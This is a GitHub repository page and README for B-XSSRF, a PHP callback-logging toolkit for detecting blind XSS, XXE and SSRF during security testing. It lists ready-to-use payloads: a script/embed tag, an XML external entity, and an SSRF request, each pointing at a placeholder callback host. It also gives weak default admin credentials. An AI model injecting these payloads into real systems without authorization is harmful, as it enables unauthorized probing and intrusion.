Skip to content
Toolkit to detect and keep track on Blind XSS, XXE & SSRF
PHP TSQL
Branch: master
Clone or download
Latest commit 197784f Aug 23, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
img Add files via upload Aug 23, 2019
README.md Update README.md Aug 23, 2019
database.sql Add files via upload Aug 23, 2019
db.php Add files via upload Aug 23, 2019
index.php Add files via upload Aug 23, 2019
login.php Add files via upload Aug 23, 2019
logout.php Add files via upload Aug 23, 2019
request.php Add files via upload Aug 23, 2019
settings.php Add files via upload Aug 23, 2019

README.md


B-XSSRF
B-XSSRF

Toolkit to detect and keep track on Blind XSS, XXE & SSRF

B-XSSRF

SETUP

  • Upload the files to your server.
  • Create a Database and upload database.sql file to it.
  • Change the DB Credentials in db.php file.
  • Ready.

USAGE

BLIND XSS

<embed src="http://mysite.com/bxssrf/request.php">
<script src="http://mysite.com/bxssrf/request.php">

BLIND XXE

<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://mysite.com/bxssrf/request.php"> %ext;
]>
<r></r>

SSRF

GET /testssrf.php=http://mysite.com/bxssrf/request.php

DEFAULT CREDENTIALS

USER : admin@test.com
PASS : 123456
You can’t perform that action at this time.